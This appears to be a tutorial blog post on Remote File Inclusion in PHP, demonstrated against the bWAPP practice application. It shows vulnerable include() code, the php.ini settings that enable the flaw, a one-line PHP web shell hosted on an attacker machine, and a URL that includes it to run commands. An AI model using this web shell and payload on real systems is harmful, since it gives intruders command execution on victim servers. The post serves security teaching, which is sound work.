Introduction
Remote File Inclusion ( RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application, the web application downloads and executes a remote file. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.
Example Remote File Inclusion in PHP
In order for Remote fle inclusion ,two functions in PHP’s configuration file need to be set: “allow_url_fopen=On” and “allow_url_include=On” in “php.ini” file
- allow_url_fopen: This option enables the URL-aware fopen wrappers that enable accessing URL object like files. Default wrappers are provided for the access of remote files using the ftp or http protocol, some extensions like zlib may register additional wrappers.
-
allow_url_include: This option allows the use of URL-aware fopen wrappers with the following functions: include, include_once, require, require_once.
Consider following url:
http://192.168.28.129/bWAPP/rlfi.php?language=lang_en.php&action=go
The value of “language” parameter is taken into the following PHP code, and the file is included:
<?php $language = $_GET["language"]; include($language); ?>
- Now, you can set value for language parameter with some website from internet.
Example: http://192.168.28.129/bWAPP/rlfi.php?language=http://hydrasky.com&action=go
Web application download page http://hydrasky.com and present in include() function. This mean RFI vulnerability occurred!
- Lets create remote web shell to compromise with system shell, read file, write file … that files must not executable on the remote server, because if the malicious file execute on remote, victim server will receive HTML content.
Example http://192.168.28.1:8888/remote_shell.txt
<?php $output = shell_exec($_GET["cmd"]); echo "<pre> $output </pre>"; ?>
http://192.168.28.129/bWAPP/rlfi.php?language=http://192.168.28.1:8888/remote_shell.txt&action=go&cmd=ls -l
Reference
https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion